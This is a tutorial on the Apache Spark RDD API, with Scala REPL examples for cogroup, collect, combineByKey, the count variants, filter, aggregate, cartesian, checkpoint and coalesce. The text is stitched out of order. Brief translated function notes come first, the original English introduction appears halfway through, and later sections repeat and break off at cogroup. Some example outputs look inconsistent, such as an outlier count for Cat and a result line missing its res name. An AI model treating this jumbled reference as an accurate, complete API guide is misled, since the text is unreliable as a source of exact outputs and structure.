def cogroup[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)], partitioner: Partitioner): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

def groupWith[W](other: RDD[(K, W)]): RDD[(K, (Seq[V],Seq[W]))]

def groupWith[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)]): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

Examples

val a = sc.parallelize(List(1, 2, 1, 3), 1)

val b = a.map((_, "b"))

val c = a.map((_, "c"))

b.cogroup(c).collect

res7: Array[(Int, (Seq[String], Seq[String]))] =Array(

(2,(ArrayBuffer(b),ArrayBuffer(c))),

(3,(ArrayBuffer(b),ArrayBuffer(c))),

(1,(ArrayBuffer(b, b),ArrayBuffer(c, c)))

)

val d = a.map((_, "d"))

b.cogroup(c, d).collect

res9: Array[(Int, (Seq[String], Seq[String],Seq[String]))] = Array(

(2,(ArrayBuffer(b),ArrayBuffer(c),ArrayBuffer(d))),

(3,(ArrayBuffer(b),ArrayBuffer(c),ArrayBuffer(d))),

(1,(ArrayBuffer(b, b),ArrayBuffer(c, c),ArrayBuffer(d,d)))

)

val x = sc.parallelize(List((1, "apple"),(2, "banana"), (3, "orange"), (4, "kiwi")), 2)

val y = sc.parallelize(List((5, "computer"),(1, "laptop"), (1, "desktop"), (4, "iPad")), 2)

x.cogroup(y).collect

res23: Array[(Int, (Seq[String], Seq[String]))] =Array(

(4,(ArrayBuffer(kiwi),ArrayBuffer(iPad))),

(2,(ArrayBuffer(banana),ArrayBuffer())),

(3,(ArrayBuffer(orange),ArrayBuffer())),

(1,(ArrayBuffer(apple),ArrayBuffer(laptop, desktop))),

(5,(ArrayBuffer(),ArrayBuffer(computer))))

Collect,toArray:

Converts the RDD into a Scala array

def collect(): Array[T]

def collect[U: ClassTag](f: PartialFunction[T, U]):RDD[U]

def toArray(): Array[T]

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog", "Gnu","Rat"), 2)

c.collect

res29: Array[String] = Array(Gnu, Cat, Rat, Dog, Gnu,Rat)

collectAsMap:

Like collect, but for key-value RDDs: the result is a Scala Map that keeps the key-to-value mapping

def collectAsMap(): Map[K, V]

val a = sc.parallelize(List(1, 2, 1, 3), 1)

val b = a.zip(a)

b.collectAsMap

res1: scala.collection.Map[Int,Int] = Map(2 -> 2, 1-> 1, 3 -> 3)

combineByKey:

Combines the values that share a key into one collection (a List in the example below); the result holds one combined collection per distinct key.

def combineByKey[C](createCombiner: V => C,mergeValue: (C, V) => C, mergeCombiners: (C, C) => C): RDD[(K, C)]

def combineByKey[C](createCombiner: V => C,mergeValue: (C, V) => C, mergeCombiners: (C, C) => C, numPartitions:Int): RDD[(K, C)]

def combineByKey[C](createCombiner: V => C,mergeValue: (C, V) => C, mergeCombiners: (C, C) => C, partitioner:Partitioner, mapSideCombine: Boolean = true, serializerClass: String = null):RDD[(K, C)]

val a =sc.parallelize(List("dog","cat","gnu","salmon","rabbit","turkey","wolf","bear","bee"),3)

val b = sc.parallelize(List(1,1,2,2,2,1,2,2,2), 3)

val c = b.zip(a)

val d = c.combineByKey(List(_), (x:List[String],y:String) => y :: x, (x:List[String], y:List[String]) => x ::: y)

d.collect

res16: Array[(Int, List[String])] = Array((1,List(cat,dog, turkey)), (2,List(gnu, rabbit, salmon, bee, bear, wolf)))

:: (prepend an element) and ::: (concatenate two lists) are both List operators

compute:

Evaluates the dependencies and computes the actual contents of the RDD. Not meant to be called directly by users

def compute(split: Partition, context: TaskContext):Iterator[T]

context, sparkContext:

Returns the SparkContext that was used to create the RDD.

def context: SparkContext

def sparkContext: SparkContext

count:

Returns the number of items in the RDD

def count(): Long

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog"), 2)

c.count

res2: Long = 4

countApprox:

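An approximate version of count: it returns a possibly incomplete result within the given timeout.

def countApprox(timeout: Long, confidence: Double = 0.95): PartialResult[BoundedDouble]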

countByKey [Pair]:

Like count, but for key-value RDDs: it counts the items for each key and returns a map

def countByKey(): Map[K, Long]

val c = sc.parallelize(List((3, "Gnu"), (3,"Yak"), (5, "Mouse"), (3, "Dog")), 2)

c.countByKey

res3: scala.collection.Map[Int,Long] = Map(3 -> 3,5 -> 1)

countByValue:

Counts the occurrences of each value and returns a value -> count map

def countByValue(): Map[T, Long]

val b =sc.parallelize(List(1,2,3,4,5,6,7,8,2,4,2,1,1,1,1,1))

b.countByValue

res27: scala.collection.Map[Int,Long] = Map(5 -> 1,8 -> 1, 3 -> 1, 6 -> 1, 1 -> 6, 2 -> 3, 4 -> 2, 7 -> 1)
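The result above is a map from each distinct value to how often it occurs. A local equivalent in plain Java, with hypothetical names and no Spark involved, looks like this:

```java
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

class CountByValueSketch {
    // Counts how often each value occurs; a TreeMap keeps the keys sorted for printing.
    static <T extends Comparable<T>> Map<T, Long> countByValue(List<T> items) {
        Map<T, Long> counts = new TreeMap<>();
        for (T item : items) {
            counts.merge(item, 1L, Long::sum);
        }
        return counts;
    }

    public static void main(String[] args) {
        List<Integer> b = List.of(1, 2, 3, 4, 5, 6, 7, 8, 2, 4, 2, 1, 1, 1, 1, 1);
        System.out.println(countByValue(b));
    }
}
```

The counts match the Spark output (for instance 1 occurs 6 times and 2 occurs 3 times); only the key order differs, because the Scala map is unordered.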

countByValueApprox:

An approximate version of countByValue.

def countByValueApprox(timeout: Long, confidence:Double = 0.95): PartialResult[Map[T, BoundedDouble]]

countApproxDistinct:

Approximate count of the distinct values; useful when the dataset is large

def countApproxDistinct(relativeSD: Double = 0.05): Long

val a = sc.parallelize(1 to 10000, 20)

val b = a++a++a++a++a

b.countApproxDistinct(0.1)

val a = sc.parallelize(1 to 30000, 30)

val b = a++a++a++a++a

b.countApproxDistinct(0.05)

res28: Long = 30097

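As the result shows, it estimates the number of distinct values (the exact answer here is 30000)

countApproxDistinctByKey [Pair]:

Like countApproxDistinct, but it estimates the number of distinct values for each key, so the RDD must consist of key-value pairs. It runs quickly.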

def countApproxDistinctByKey(relativeSD: Double =0.05): RDD[(K, Long)]

def countApproxDistinctByKey(relativeSD: Double,numPartitions: Int): RDD[(K, Long)]

def countApproxDistinctByKey(relativeSD: Double,partitioner: Partitioner): RDD[(K, Long)]

val a = sc.parallelize(List("Gnu","Cat", "Rat", "Dog"), 2)

val b = sc.parallelize(a.takeSample(true, 10000, 0),20)

val c = sc.parallelize(1 to b.count().toInt, 20)

val d = b.zip(c)

d.countApproxDistinctByKey(0.1).collect

res15: Array[(String, Long)] = Array((Rat,2567),(Cat,3357), (Dog,2414), (Gnu,2494))

d.countApproxDistinctByKey(0.01).collect

res16: Array[(String, Long)] = Array((Rat,2555),(Cat,2455), (Dog,2425), (Gnu,2513))

d.countApproxDistinctByKey(0.001).collect

res0: Array[(String, Long)] = Array((Rat,2562),(Cat,2464), (Dog,2451), (Gnu,2521))

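As the results show, it gives a rough estimate of the number of distinct values per key

dependencies:

Returns the RDDs that the current RDD depends on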

final def dependencies: Seq[Dependency[_]]

val b = sc.parallelize(List(1,2,3,4,5,6,7,8,2,4,2,1,1,1,1,1))

b: org.apache.spark.rdd.RDD[Int] =ParallelCollectionRDD[32] at parallelize at <console>:12

b.dependencies.length

Int = 0

b.map(a => a).dependencies.length

res40: Int = 1

b.cartesian(a).dependencies.length

res41: Int = 2

b.cartesian(a).dependencies

res42: Seq[org.apache.spark.Dependency[_]] =List(org.apache.spark.rdd.CartesianRDD$$anon$1@576ddaaa,org.apache.spark.rdd.CartesianRDD$$anon$2@6d2efbbd)

distinct:

Returns a new RDD that contains each distinct value exactly once

def distinct(): RDD[T]

def distinct(numPartitions: Int): RDD[T]

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog", "Gnu","Rat"), 2)

c.distinct.collect

res6: Array[String] = Array(Dog, Gnu, Cat, Rat)

val a = sc.parallelize(List(1,2,3,4,5,6,7,8,9,10))

a.distinct(2).partitions.length

res16: Int = 2

a.distinct(3).partitions.length

res17: Int = 3

The numeric argument is the number of partitions to use

first:

Returns the first item in the RDD

def first(): T

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog"), 2)

c.first

res1: String = Gnu

filter:

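A very commonly used function. It takes a function that returns a Boolean, applies it to every item of the RDD, and returns an RDD of the items for which the result is true

def filter(f: T => Boolean): RDD[T]

val a = sc.parallelize(1 to 10, 3)

val b = a.filter(_ % 2 == 0)

b.collect

res3: Array[Int] = Array(2, 4, 6, 8, 10)

Note: the function must be able to handle every item in the RDD. Scala provides ways to deal with mixed data types, for example when some items are corrupt and you want to skip them while still applying something like map() to the intact ones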

Examples for mixed data without partial functions:

val b = sc.parallelize(1 to 8)

b.filter(_ < 4).collect

res15: Array[Int] = Array(1, 2, 3)

val a = sc.parallelize(List("cat","horse", 4.0, 3.5, 2, "dog"))

a.filter(_ < 4).collect

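<console>:15: error: value < is not a member of Any

Reason for the failure:

The list mixes strings and numbers, so its element type is Any, and the < operator is not defined for Any

Handling mixed types: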

val a = sc.parallelize(List("cat","horse", 4.0, 3.5, 2, "dog"))

a.collect({case a: Int => "is integer"

case b: String => "is string" }).collect

res17: Array[String] = Array(is string, is string, is integer, is string)

val myfunc: PartialFunction[Any, Any] = {

case a: Int => "is integer"

case b: String => "is string" }

myfunc.isDefinedAt("") // checks whether myfunc is defined for this value

res21: Boolean = true

myfunc.isDefinedAt(1)

res22: Boolean = true

myfunc.isDefinedAt(1.5) // not defined for a Double

res23: Boolean = false
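The behaviour of collect with a partial function (keep the items the function is defined for, transform them, and silently drop the rest) can be imitated in plain Java with instanceof checks. This is a local sketch with hypothetical names, not Spark code.

```java
import java.util.ArrayList;
import java.util.List;

class PartialCollectSketch {
    // Maps integers and strings to a label; items of any other type are skipped,
    // just as a partial function is simply not applied where it is undefined.
    static List<String> describe(List<?> items) {
        List<String> labels = new ArrayList<>();
        for (Object item : items) {
            if (item instanceof Integer) {
                labels.add("is integer");
            } else if (item instanceof String) {
                labels.add("is string");
            }
        }
        return labels;
    }

    public static void main(String[] args) {
        System.out.println(describe(List.of("cat", "horse", 4.0, 3.5, 2, "dog")));
    }
}
```

The two Double values 4.0 and 3.5 produce no output, which mirrors isDefinedAt(1.5) returning false in the Scala session.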

Our research group has a very strong focus on using and improving Apache Spark to solve real world problems. In order to do this we need to have a very solid understanding of the capabilities of Spark. So one of the first things we have done is to go through the entire Spark RDD API and write examples to test their functionality. This has been a very useful exercise and we would like to share the examples with everyone.

Authors of examples: Matthias Langer and Zhen He

Email addresses: m.langer@latrobe.edu.au, z.he@latrobe.edu.au

These examples have only been tested for Spark version 0.9. We assume the functionality of Spark is stable and therefore the examples should be valid for later releases.

Here is a pdf of all the examples: SparkExamples

The RDD API By Example

RDD is short for Resilient Distributed Dataset. RDDs are the workhorse of the Spark system. As a user, one can consider an RDD as a handle for a collection of individual data partitions, which are the result of some computation.

However, an RDD is actually more than that. On cluster installations, separate data partitions can be on separate nodes. Using the RDD as a handle one can access all partitions and perform computations and transformations using the contained data. Whenever a part of an RDD or an entire RDD is lost, the system is able to reconstruct the data of lost partitions by using lineage information. Lineage refers to the sequence of transformations used to produce the current RDD. As a result, Spark is able to recover automatically from most failures.

All RDDs available in Spark derive either directly or indirectly from the class RDD. This class comes with a large set of methods that perform operations on the data within the associated partitions. The class RDD is abstract. Whenever one uses an RDD, one is actually using a concrete implementation of RDD. These implementations have to override some core functions to make the RDD behave as expected.

One reason why Spark has lately become a very popular system for processing big data is that it does not impose restrictions regarding what data can be stored within RDD partitions. The RDD API already contains many useful operations. But, because the creators of Spark had to keep the core API of RDDs common enough to handle arbitrary data-types, many convenience functions are missing.

The basic RDD API considers each data item as a single value. However, users often want to work with key-value pairs. Therefore Spark extended the interface of RDD to provide additional functions (PairRDDFunctions), which explicitly work on key-value pairs. Currently, there are four extensions to the RDD API available in Spark. They are as follows:

DoubleRDDFunctions

This extension contains many useful methods for aggregating numeric values. They become available if the data items of an RDD are implicitly convertible to the Scala data-type double.

PairRDDFunctions

Methods defined in this interface extension become available when the data items have a two component tuple structure. Spark will interpret the first tuple item (i.e. tuplename._1) as the key and the second item (i.e. tuplename._2) as the associated value.

OrderedRDDFunctions

Methods defined in this interface extension become available if the data items are two-component tuples where the key is implicitly sortable.

SequenceFileRDDFunctions

This extension contains several methods that allow users to create Hadoop sequence files from RDDs. The data items must be two-component key-value tuples as required by the PairRDDFunctions. However, there are additional requirements considering the convertibility of the tuple components to Writable types.

Since Spark will make methods with extended functionality automatically available to users when the data items fulfill the above described requirements, we decided to list all possible available functions in strictly alphabetical order. We will append one of the following to the function name to indicate it belongs to an extension that requires the data items to conform to a certain format or type.

[Double] - Double RDD Functions

[Ordered] - OrderedRDDFunctions

[Pair] - PairRDDFunctions

[SeqFile] - SequenceFileRDDFunctions

aggregate

The aggregate method provides an interface for performing highly customized reductions and aggregations with an RDD. However, due to the way Scala and Spark execute and process data, care must be taken to achieve deterministic behavior. The following list contains a few observations we made while experimenting with aggregate:

The reduce and combine functions have to be commutative and associative.

As can be seen from the function definition below, the output type of the combiner must be the same as its input type. This is necessary because Spark chains its executions: the output of one call becomes an input of the next.

The zero value is the initial value of the U component when either seqOp or combOp is executed for the first element of its domain of influence. Depending on what you want to achieve, you may have to change it. However, to make your code deterministic, make sure that it yields the same result regardless of the number or size of partitions.

Do not assume any execution order for either partition computations or combining partitions.

The neutral zeroValue is applied at the beginning of each sequence of reduces within the individual partitions and again when the output of separate partitions is combined.

Why have two separate combine functions? The first function maps the input values into the result space. Note that the aggregation data type (first input and output) can differ from the element type (U != T). The second function reduces these mapped values in the result space.

Why would one want to use two input data types? Let us assume we do an archaeological site survey using a metal detector. While walking through the site we take GPS coordinates of important findings based on the output of the metal detector. Later, we intend to draw an image of a map that highlights these locations using the aggregate function. In this case the zeroValue could be an area map with no highlights. The possibly huge set of input data is stored as GPS coordinates across many partitions. seqOp could convert the GPS coordinates to map coordinates and put a marker on the map at the respective position. combOp will receive these highlights as partial maps and combine them into a single final output map.
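The observations above can be illustrated with a small model in plain Scala. This is only a sketch and not Spark's implementation: the object AggregateModel, its aggregate helper and the partitions parameter (a Seq of Seqs standing in for the partitions of an RDD) are names assumed for illustration, and the model always visits partitions in order, which Spark does not guarantee.

```scala
// Plain-Scala model of aggregate; no Spark involved.
// `partitions` is a hypothetical stand-in for the partitions of an RDD.
object AggregateModel {
  def aggregate[T, U](partitions: Seq[Seq[T]], zeroValue: U)(
      seqOp: (U, T) => U, combOp: (U, U) => U): U = {
    // zeroValue seeds the fold inside every partition ...
    val perPartition = partitions.map(_.foldLeft(zeroValue)(seqOp))
    // ... and seeds the fold that merges the partition results.
    perPartition.foldLeft(zeroValue)(combOp)
  }

  def main(args: Array[String]): Unit = {
    val ints = Seq(Seq(1, 2, 3), Seq(4, 5, 6))
    // Maximum per partition (3 and 6), then summed.
    println(aggregate(ints, 0)((a, b) => math.max(a, b), _ + _)) // 9

    val strs = Seq(Seq("a", "b", "c"), Seq("d", "e", "f"))
    // A non-neutral zero value is applied once per partition and once on merge.
    println(aggregate(strs, "x")(_ + _, _ + _)) // xxabcxdef

    // U != T: elements are Int, the accumulator is a (sum, count) pair.
    println(aggregate(ints, (0, 0))(
      (acc, v) => (acc._1 + v, acc._2 + 1),
      (a, b) => (a._1 + b._1, a._2 + b._2))) // (21,6)
  }
}
```

With two partitions the zero value "x" shows up three times in the string result, which is why a zero value that is not neutral makes the output depend on the number of partitions.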

Listing Variants

def aggregate[U: ClassTag](zeroValue: U)(seqOp: (U, T) => U, combOp: (U, U) => U): U

Examples 1

val z = sc.parallelize(List(1,2,3,4,5,6), 2)

z.aggregate(0)(math.max(_, _), _ + _)

res40: Int = 9

val z = sc.parallelize(List("a","b","c","d","e","f"), 2)

z.aggregate("")(_ + _, _+_)

res115: String = abcdef

z.aggregate("x")(_ + _, _+_)

res116: String = xxdefxabc

val z = sc.parallelize(List("12","23","345","4567"), 2)

z.aggregate("")((x,y) => math.max(x.length, y.length).toString, (x,y) => x + y)

res141: String = 42

z.aggregate("")((x,y) => math.min(x.length, y.length).toString, (x,y) => x + y)

res142: String = 11

val z = sc.parallelize(List("12","23","345",""), 2)

z.aggregate("")((x,y) => math.min(x.length, y.length).toString, (x,y) => x + y)

res143: String = 10

The main issue with the code above is that the result of the inner min is converted to a string of length 1, so from the second element of a partition onward x.length is always 1, regardless of the data seen so far.

The zero in the output is due to the empty string being the last string in the list. We see this result because no further reduction takes place within the partition after the final string.

Examples 2

val z = sc.parallelize(List("12","23","","345"), 2)

z.aggregate("")((x,y) => math.min(x.length, y.length).toString, (x,y) => x + y)

res144: String = 11

In contrast to the previous example, this example has the empty string at the beginning of the second partition. This feeds a length of zero into the second reduce, which then raises it to a length of 1. (Warning: The example above shows bad design because the output depends on the order of the data inside the partitions.)
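The order dependence can be reproduced without Spark. The sketch below models aggregate as one fold per partition followed by a fold over the partition results; the object OrderDependence and its helper names are assumptions made for illustration. It also shows one possible order-independent variant, which keeps the minimum length as an Int instead of converting it back to a string.

```scala
// Plain-Scala sketch; the Seq of Seqs is a hypothetical stand-in for RDD partitions.
object OrderDependence {
  def aggregate[T, U](partitions: Seq[Seq[T]], zero: U)(
      seqOp: (U, T) => U, combOp: (U, U) => U): U =
    partitions.map(_.foldLeft(zero)(seqOp)).foldLeft(zero)(combOp)

  // The seqOp from the examples: its result depends on the element order.
  val minLenAsString: (String, String) => String =
    (x, y) => math.min(x.length, y.length).toString

  // Order-independent alternative: track the minimum length as an Int.
  val minLen: (Int, String) => Int = (m, s) => math.min(m, s.length)

  def main(args: Array[String]): Unit = {
    val emptyLast  = Seq(Seq("12", "23"), Seq("345", ""))
    val emptyFirst = Seq(Seq("12", "23"), Seq("", "345"))

    println(aggregate(emptyLast, "")(minLenAsString, _ + _))  // 10
    println(aggregate(emptyFirst, "")(minLenAsString, _ + _)) // 11

    // Same data, either order: the shortest string has length 0.
    println(aggregate(emptyLast, Int.MaxValue)(minLen, (a, b) => math.min(a, b)))  // 0
    println(aggregate(emptyFirst, Int.MaxValue)(minLen, (a, b) => math.min(a, b))) // 0
  }
}
```

Here Int.MaxValue is a neutral zero value for min, and min over integers is commutative and associative, so the result no longer depends on how the data is ordered or partitioned.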

cartesian

Computes the cartesian product of two RDDs (i.e. each item of the first RDD is paired with each item of the second RDD) and returns the result as a new RDD. (Warning: Be careful when using this function! Memory consumption can quickly become an issue.)

Listing Variants

def cartesian[U: ClassTag](other: RDD[U]): RDD[(T, U)]

Example

val x = sc.parallelize(List(1,2,3,4,5))

val y = sc.parallelize(List(6,7,8,9,10))

x.cartesian(y).collect

res0: Array[(Int, Int)] = Array((1,6), (1,7), (1,8), (1,9), (1,10), (2,6), (2,7), (2,8), (2,9), (2,10), (3,6), (3,7), (3,8), (3,9), (3,10), (4,6), (5,6), (4,7), (5,7), (4,8), (5,8), (4,9), (4,10), (5,9), (5,10))
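To get a feeling for why memory consumption becomes an issue, the pairing can be modelled on ordinary Scala collections. This is a sketch only: CartesianModel and its cartesian helper are hypothetical names, and no Spark is involved. The point is that the result holds n * m pairs for inputs of size n and m.

```scala
// Plain-Scala sketch of the cartesian product on in-memory sequences.
object CartesianModel {
  def cartesian[T, U](xs: Seq[T], ys: Seq[U]): Seq[(T, U)] =
    for (x <- xs; y <- ys) yield (x, y) // every x paired with every y

  def main(args: Array[String]): Unit = {
    println(cartesian(1 to 5, 6 to 10).size)      // 25
    println(cartesian(1 to 1000, 1 to 1000).size) // 1000000
  }
}
```

Two inputs of only a thousand items each already produce a million pairs.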

checkpoint

Creates a checkpoint the next time the RDD is computed. Checkpointed RDDs are stored as binary files within the checkpoint directory, which can be specified through the Spark context. (Warning: Spark applies lazy evaluation. Checkpointing will not occur until an action is invoked.)

Important note: the directory "my_directory_name" should exist on all slaves. Alternatively, you can use an HDFS directory URL.

Listing Variants

def checkpoint()

Example

sc.setCheckpointDir("my_directory_name")

val a = sc.parallelize(1 to 4)

a.checkpoint

a.count

14/02/25 18:13:53 INFO SparkContext: Starting job: count at <console>:15

...

14/02/25 18:13:53 INFO MemoryStore: Block broadcast_5 stored as values to memory (estimated size 115.7 KB, free 296.3 MB)

14/02/25 18:13:53 INFO RDDCheckpointData: Done checkpointing RDD 11 to file:/home/cloudera/Documents/spark-0.9.0-incubating-bin-cdh4/bin/my_directory_name/65407913-fdc6-4ec1-82c9-48a1656b95d6/rdd-11, new parent is RDD 12

res23: Long = 4

coalesce, repartition

Coalesces the associated data into a given number of partitions. repartition(numPartitions) is simply an abbreviation for coalesce(numPartitions, shuffle = true).

Listing Variants

def coalesce(numPartitions: Int, shuffle: Boolean = false): RDD[T]

def repartition(numPartitions: Int): RDD[T]

Example

val y = sc.parallelize(1 to 10, 10)

val z = y.coalesce(2, false)

z.partitions.length

res9: Int = 2
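What coalescing without a shuffle means can be sketched on plain Scala collections: whole parent partitions are merged into fewer groups, and individual items are not redistributed. The object CoalesceModel is a hypothetical illustration, and grouping neighbouring partitions is an assumption of this sketch; Spark chooses its groups differently (for example, taking data locality into account).

```scala
// Plain-Scala sketch; the Seq of Seqs is a hypothetical stand-in for RDD partitions.
object CoalesceModel {
  // Merge whole parent partitions into at most numPartitions groups.
  def coalesce[T](partitions: Seq[Seq[T]], numPartitions: Int): Seq[Seq[T]] = {
    require(numPartitions > 0, "numPartitions must be positive")
    val groupSize = math.ceil(partitions.size.toDouble / numPartitions).toInt
    partitions.grouped(math.max(groupSize, 1)).map(_.flatten).toList
  }

  def main(args: Array[String]): Unit = {
    val parents = (1 to 10).map(Seq(_)) // ten partitions with one item each
    println(coalesce(parents, 2).length)  // 2
    println(coalesce(parents, 20).length) // 10
  }
}
```

The second call shows that merging alone cannot raise the number of partitions; increasing it requires a shuffle, which is what repartition does.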

cogroup [Pair], groupWith [Pair]

A very powerful set of functions that allow grouping up to three key-value RDDs together using their keys.